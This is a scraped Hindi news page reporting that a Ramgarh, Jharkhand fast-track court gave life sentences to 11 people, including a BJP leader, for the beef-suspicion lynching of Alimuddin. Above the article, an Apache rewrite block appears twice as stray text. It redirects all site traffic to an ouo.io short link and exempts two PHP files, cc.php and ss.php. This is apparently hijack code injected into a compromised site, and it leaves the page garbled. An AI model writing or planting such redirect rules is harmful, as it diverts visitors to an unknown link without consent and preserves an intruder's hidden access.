
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 448
रांची। झारखंड के रामगढ़ जिले की फास्ट ट्रैक अदालत ने भाजपा नेता समेत 11 जनों को आजीवन कारावास की सजा सुनाई है। इन सभी पर गोमांस रखने के शक में एक व्यक्ति की पीट—पीटकर हत्या करने का आरोप था।
वकील के अनुसार अदालत ने भाजपा के नित्यानंद महतो सहित 11 लोगों को 16 मार्च को दोषी करार दिया था। बीते साल 29 जून को भीड़ ने रामगढ़ जिले में अलीमुद्दीन पर गोमांस ले जाने का आरोप लगाकर उनकी हत्या कर दी थी। यह मुकदमा झारखंड उच्च न्यायालय की निगरानी में चला। मुकदमे के दौरान अभियोजक ने 19 गवाह व 59 दस्तावेज प्रस्तुत किए। आरोपियों को भारतीय दंड संहिता की विभिन्न धाराओं में दोषी ठहराया गया। आपको बता दें कि बीते साल बच्चों को उठाने व गोमांस ले जाने के आरोप में झारखंड में दर्जन भर लोगों को पीट-पीटकर मार दिया गया था।